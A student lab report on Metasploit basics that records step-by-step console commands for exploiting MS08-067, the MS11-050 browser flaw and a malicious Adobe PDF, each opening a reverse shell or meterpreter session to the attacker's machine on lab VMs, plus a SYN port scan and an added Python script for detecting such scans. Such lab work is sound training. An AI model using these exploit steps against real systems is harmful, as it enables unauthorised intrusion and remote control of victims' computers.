# 2017-2018-2 20155319 "Network Countermeasure Technology" Exp5: MSF Basic Application


Basic question answers

  • Explain in your own words what exploit, payload and encode are
      • exploit: the process by which an attacker makes use of a vulnerability to attack a target; it acts as the vehicle that carries the payload.
      • payload: the attack payload, i.e. the code that runs after exploitation, such as a backdoor.
      • encode: encoding the payload, used to disguise it.

Practice process record

1. Windows Service Penetration Attack - MS08-067 Security Vulnerability

① Attack machine: kali ② Target machine: Windows XP SP3 (English)

The target machine can be pinged from the attack machine.

Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:

    msf > search ms08-067                                                // search for modules related to the MS08-067 vulnerability
    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > show payloads                         // list the payloads usable with this module
    msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp // tcp reverse connection
    msf exploit(ms08_067_netapi) > set LHOST 192.168.72.131              // attack machine ip
    msf exploit(ms08_067_netapi) > set LPORT 5319
    msf exploit(ms08_067_netapi) > set RHOST 192.168.72.135              // target ip
    msf exploit(ms08_067_netapi) > set target 0                          // automatically select the target system type
    msf exploit(ms08_067_netapi) > exploit

  • Success! The results of the attack are as follows:

2. Browser Penetration Attack - MS11-050

① Attack machine: kali ② Target machine: Windows XP Professional SP2 / Windows 7 Professional ③ IE version: 7.0/8.0

Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:

    msf > use windows/browser/ms11_050_mshtml_cobjectelement
    msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http // http reverse connection
    msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.72.131                     // attack machine ip
    msf exploit(ms11_050_cobjectelement) > set LPORT 5319                               // fixed attack port
    msf exploit(ms11_050_cobjectelement) > set URIPATH rhl19                            // uniform resource identifier path
    msf exploit(ms11_050_cobjectelement) > exploit

  • The module starts successfully and prints the Local IP (the URL it serves):

  • Accessing http://192.168.72.131:8080/rhl19 from the target machine produces a pop-up warning:

  • I tried modifying the relevant IE browser settings to lower its security level.

  • The second time I tried to access the above URL in IE, it still failed... very sad...

3. Client-side attacks Adobe

① Attack machine: kali ② Target machine: Windows XP Professional SP2 ③ Adobe version: 9.3

Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:

    msf > use windows/fileformat/adobe_cooltype_sing
    msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp // tcp reverse connection
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.72.131                    // attack machine ip
    msf exploit(adobe_cooltype_sing) > set LPORT 5319                              // attack port
    msf exploit(adobe_cooltype_sing) > set FILENAME 20155319.pdf                   // name of the generated pdf file
    msf exploit(adobe_cooltype_sing) > exploit                                     // generate the file

  • The pdf was generated successfully.

  • Since the generated file is placed in a hidden directory, use the copy command to copy it somewhere else.

  • After transferring or copying the pdf file to the target machine, enter back on kali to leave the current module, then enter the handler (listener) module with the following commands:

    msf > use exploit/multi/handler                                   // enter the handler module
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp // tcp reverse connection
    msf exploit(handler) > set LHOST 192.168.72.131                    // attack machine ip
    msf exploit(handler) > set LPORT 5319                              // fixed attack port
    msf exploit(handler) > exploit

  • Then open the pdf file on the target machine, and the connection is established successfully.

4. Metasploit - Information Collection Module

1. Port scan

    msf > use auxiliary/scanner/portscan/syn       // use the portscan module
    msf auxiliary(syn) > show options
    msf auxiliary(syn) > set RHOSTS 192.168.72.137  // target
    msf auxiliary(syn) > set THREADS 50             // number of threads
    msf auxiliary(syn) > exploit

  • The scan was terminated early because it was taking too long.

2. Scan the TCP port usage of the target machine

  • Enter the following commands:

  • Enter run to start the scan; the usage of all TCP ports on the WinXP target machine is then listed.
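The port scans above are noisy from the target's side: one source sends SYN packets to many different ports on one host within a few seconds, which is exactly the pattern a host firewall or IDS log can be checked for. The following script is an added example written for this page, not part of the original lab report or of Metasploit. It assumes a constructed log format (timestamp, source ip, destination ip, destination port, TCP flags) that you would adapt to your own firewall or netflow export, and it reuses the lab's 192.168.72.x addresses purely as constructed sample data.

```python
"""Flag a likely SYN port scan in firewall-style log lines (added example).

Log format assumed here (constructed for this demo, one event per line):
    <ISO-8601 timestamp> <src ip> <dst ip> <dst port> <tcp flags>
where flags "S" means a bare SYN, i.e. a new connection attempt.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def parse_line(line):
    """Split one log line into (timestamp, src, dst, dport, flags)."""
    ts, src, dst, dport, flags = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), flags


def detect_syn_scans(lines, threshold=20, window=timedelta(seconds=10)):
    """Return {(src, dst): distinct_port_count} for every source that sent
    bare SYNs to at least `threshold` distinct ports on one host inside any
    `window`-long interval. Normal clients reuse a handful of service ports,
    so a high distinct-port count in a short window is the scan signature."""
    events = defaultdict(list)  # (src, dst) -> [(timestamp, dport), ...]
    for line in lines:
        ts, src, dst, dport, flags = parse_line(line)
        if flags == "S":
            events[(src, dst)].append((ts, dport))

    alerts = {}
    for key, hits in events.items():
        hits.sort()  # time order, so a sliding window can be used
        start = 0
        for end in range(len(hits)):
            # shrink the window from the left until it spans <= `window`
            while hits[end][0] - hits[start][0] > window:
                start += 1
            ports = {port for _, port in hits[start:end + 1]}
            if len(ports) >= threshold:
                alerts[key] = max(alerts.get(key, 0), len(ports))
    return alerts


def build_sample_log():
    """Constructed sample: a workstation making ordinary web connections to
    the server, plus one host probing 50 ports on that server in ~5 seconds."""
    base = datetime(2018, 4, 20, 10, 0, 0)
    lines = []
    for i, port in enumerate([80, 443, 80, 80, 443]):
        ts = base + timedelta(seconds=i)
        lines.append(f"{ts.isoformat()} 192.168.72.10 192.168.72.137 {port} S")
    for i, port in enumerate(range(1, 51)):
        ts = base + timedelta(milliseconds=100 * i)
        lines.append(f"{ts.isoformat()} 192.168.72.131 192.168.72.137 {port} S")
    return lines


if __name__ == "__main__":
    for (src, dst), count in detect_syn_scans(build_sample_log()).items():
        print(f"possible SYN scan: {src} -> {dst}, {count} distinct ports in window")
```

The threshold and window are the knobs to tune: a scanner module run with THREADS 50, as in the report, compresses hundreds of probes into seconds and trips the rule easily, while a browser fetching a page touches only ports 80 and 443 and never reaches the distinct-port threshold.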

Practice summary and experience

There was nothing particularly difficult in this experiment; the main effort went into configuring the environment. I spent a long time configuring it myself without success, and in the end I copied an already configured virtual machine. I experienced how specific Metasploit exploits are: they have detailed requirements on the operating system and software versions, and only succeed under particular circumstances and particular trigger conditions. This gave me a feel for the gap between the practice exercise and a real attack.

Origin http://43.154.161.224:23101/article/api/json?id=325255339&siteId=291194637